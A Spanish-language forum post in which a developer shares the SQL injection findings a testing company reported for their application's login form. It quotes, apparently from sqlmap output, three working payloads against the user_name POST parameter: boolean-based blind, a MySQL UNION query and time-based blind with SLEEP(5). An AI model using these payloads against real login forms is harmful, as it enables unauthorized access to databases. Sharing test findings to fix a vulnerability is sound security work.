Hola amigos, la empresa que testeo mi aplicacion me envio esta informacion, me comentan que estos son los parametros de etrada que utilizan para inyectar codigo SQL a mi base de datos...

Adicionalmente enviamos los parámetros utilizados para generar el SQL injection para la validación de datos de entrada

Place: POST
Parameter: user_name
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: user_name=test' AND 1604=1604 AND 'ZKgm'='ZKgm&password=test&rand=0
.9940696898259294

Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: user_name=test' UNION ALL SELECT NULL,CONCAT(0x3a73676b3a,0x704c656
a4c734a4e586d,0x3a6579633a),NULL,NULL,NULL,NULL#&p assword=test&rand=0.9940696898
259294

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: user_name=test' AND SLEEP(5) AND 'Nbsf'='Nbsf&password=test&rand=0.
9940696898259294